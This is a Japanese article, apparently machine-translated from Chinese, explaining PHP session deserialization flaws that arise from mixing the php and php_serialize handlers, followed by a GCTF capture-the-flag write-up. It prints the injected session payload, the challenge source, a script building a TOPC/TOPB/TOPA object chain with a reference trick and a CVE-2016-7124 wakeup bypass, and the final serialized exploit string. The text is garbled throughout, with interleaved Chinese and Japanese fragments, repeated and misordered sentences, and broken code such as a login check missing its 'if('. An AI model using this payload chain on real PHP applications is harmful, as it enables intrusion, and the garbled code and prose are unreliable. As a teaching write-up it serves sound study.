この記事では主にPHPのsessionデシリアライゼーションの脆弱性について紹介しますので、必要な方は参考にしてください
php.iniには3つの設定項目があります:
session.save_path="" --设置session的存储路径 session.save_handler="" --设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式) session.auto_start boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不启动 session.serialize_handler string --定义用来序列化/反序列化的处理器名字。默认使用php
上記のオプションはPHPのセッションストレージに関連するオプションです。シーケンスストレージ。
xampp コンポーネントを使用したインストールでは、上記の設定項目は次のように設定されます:
session.save_path="D:\xampp\tmp" 表明所有的session文件都是存储在xampp/tmp下 session.save_handler=files 表明session是以文件的方式来进行存储的 session.auto_start=0 表明默认不启动session session.serialize_handler=php 表明session的默认序列话引擎使用的是php序列话引擎
上記の設定では、セッションシリアル化エンジンを設定するために session.serialize_handler が使用されます。他のエンジンの場合、異なるエンジンに対応するセッションは異なる方法で保存されます。
php_binary: 格納方法は、キー名の長さに相当するASCII文字+キー名+serialize()関数でシリアル化された値
php: 格納方法は、キー名+縦棒+ Serialize() 関数でシリアル化された値
php_serialize (php>5.5.4): 保存方法は、PHP では、serialize() 関数でシリアル化された値
がデフォルトで使用されます。他のエンジンに変更したい場合は、コード ini_set('session.serialize_handler', '設定する必要のあるエンジン'); を追加するだけです。サンプルコードは次のとおりです。
session のディレクトリは /var/lib/php/sessions にあります。
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION['name'] = 'spoock'; var_dump($_SESSION);
php_serialize エンジンの下で、セッション ファイルに保存されるデータは次のとおりです。
a:1:{s:4:"name";s:6:"spoock";}
php php 内のファイルの内容エンジンは:
name|s:6:"spoock";
php_binary エンジン 以下のファイルの内容は次のとおりです:
names:6:"spoock";
名前の長さは 4 なので、4 は ASCII テーブルの EOT に対応します。 php_binary の格納規則によると、最後のものは names:6:"spoock"; です。 (Webページ上でASCII値4の文字が表示できないことに突然気づきました。ASCIIテーブルをご自身で確認してください)
PHPセッションにおけるシリアル化の危険
セッションの実装には問題ありませんPHP の場合、害は主にプログラマーによるセッションの不適切な使用によって引き起こされます。
保存された $_SESSION データを逆シリアル化するために PHP が使用するエンジンが、シリアル化に使用されるエンジンと異なる場合、データは正しく逆シリアル化されません。慎重に構築されたデータ パケットにより、プログラム検証をバイパスしたり、一部のシステム メソッドを実行したりすることが可能です。例:
$_SESSION['ryat'] = '|O:1:"A":1:{s:1:"a";s:2:"xx";}';
のようなphpファイル:
ログイン後にコピー
にアクセスすると、セッションファイルの内容は次のようになります:
root/var/lib/php/sessions cat sess_e07gghbkcm0etit02bkjlbhac6 a:1:{s:4:"ryat";s:30:"|O:1:"A":1:{s:1:"a";s:2:"xx";
ただし、この時点で、シミュレーションが別のPHPエンジンを使用して他のページを読み取る場合、その内容は(デフォルトでは php エンジンを使用します。セッション ファイルを読み取ります)
a; } } // var_dump($_SESSION);
このページにアクセスして、xx
xxarray(1) { ["a:1:{s:4:"ryat";s:30:""]=> object(A)#1 (1) { ["a"]=> string(2) "xx" } }
を出力します。これは、php エンジンを使用する場合、php エンジンがキーと値の間の区切り文字として | を使用し、その後に:1:{s :4:"ryat";s:30:" を SESSION キーとして使用するには、O:1:"A":1:{s:1:"a";s:2:"xx"; を使用します。
シリアル化と逆シリアル化に使用されるさまざまなエンジンが、セッションが php エンジンを使用してページを読み込むときに、PHP セッションのシリアル化の脆弱性の原因となります。
GCTF でのセッション逆シリアル化脆弱性分析:
index.php の内容:
<?php //error_reporting(E_ERROR & ~E_NOTICE); ini_set('session.serialize_handler', 'php_serialize'); header("content-type;text/html;charset=utf-8"); session_start(); if(isset($_GET['src'])){ $_SESSION['src'] = $_GET['src']; highlight_file(FILE); print_r($_SESSION['src']); } ?> <!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>代码审计2</title> </head> <body>
in php、シリアル化操作。はデータにアクセスするためによく使用されますが、シリアル化プロセス中に適切に処理されない場合、
<form action="./query.php" method="POST"> <input type="text" name="ticket" /> <input type="submit" /> </form> <a href="./?src=1">查看源码</a> </body> </html>
query.php の内容は次のとおりです。
/************************/ /* //query.php 部分代码 session_start(); header('Look me: edit by vim ~0~') //...... class TOPA{ public $token; public $ticket; public $username; public $password; function login(){ //if($this->username == $USERNAME && $this->password == $PASSWORD){ //抱歉 $this->username =='aaaaaaaaaaaaaaaaa' && $this->password == 'bbbbbbbbbbbbbbbbbb'){ return 'key is:{'.$this->token.'}'; } } } class TOPB{ public $obj; public $attr; function construct(){ $this->attr = null; $this->obj = null; } function toString(){ $this->obj = unserialize($this->attr); $this->obj->token = $FLAG; if($this->obj->token === $this->obj->ticket){ return (string)$this->obj; } } } class TOPC{ public $obj; public $attr; function wakeup(){ $this->attr = null; $this->obj = null; } function destruct(){ echo $this->attr; } } */
アイデアは次のとおりです。この質問では、TOPC を構築し、それが破棄されると、echo $this->attr;
が呼び出されます。
echo $this->attr;
;
将attr赋值为TOPB对象,在echo TOPB的时候会自动调用tostring魔术方法
在tostring中会调用unserialize($this->attr)
,因为后面用到token和ticket,所以显然时TOPA对象。后面判断需要$this->obj->token === $this->obj->ticket
,所以在序列化的时候进行指针引用使$a->ticket = &$a->token;
,即可绕过判断。
至于为什么(string)$this->obj
unserialize($this- >attr) で自動的に呼び出されます。
はトークンとチケットが後で使用されるため、明らかに $this->obj->token === $this->obj-> である必要がある TOPA オブジェクトです。 ticket
なので、シリアル化するときに $a->ticket = &$a->token;
を使用してポインタ参照を作成し、判定を回避します理由については です。 (string)$this->obj
はフラグを出力し、バックグラウンドで書かれたログインは
それをクリアするためのデシリアライズ
にwakeup()関数があります。 , CVE: CVE-2016-7124 を介してバイパスできるかどうかを尋ねました。ウェイクアップ機能は、オブジェクト内の数量を表すフィールドを実際のフィールドよりも大きな値に変更することでバイパスできます。
最終コード:🎜$testa = new TOPA(); $testc = new TOPC(); $testb = new TOPB(); $testa->username = 0; $testa->password = 0; $testa->ticket = &$testa->token; $sa = serialize($testa); $testc->attr = $testb; $testb->attr = $sa; $test = serialize($testc); echo $test;
|O:4:"TOPC":3:{s:3:"obj";N;s:4:"attr";O:4:"TOPB":2:{s:3:"obj";N;s:4:"attr";s:84:"O:4:"TOPA":4:{s:5:"token";N;s:6:"ticket";R:2;s:8:"username";i:0;s:8:"password";i:0;}";}}
以上がPHP の SESSION デシリアライゼーションの脆弱性の詳細な分析の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。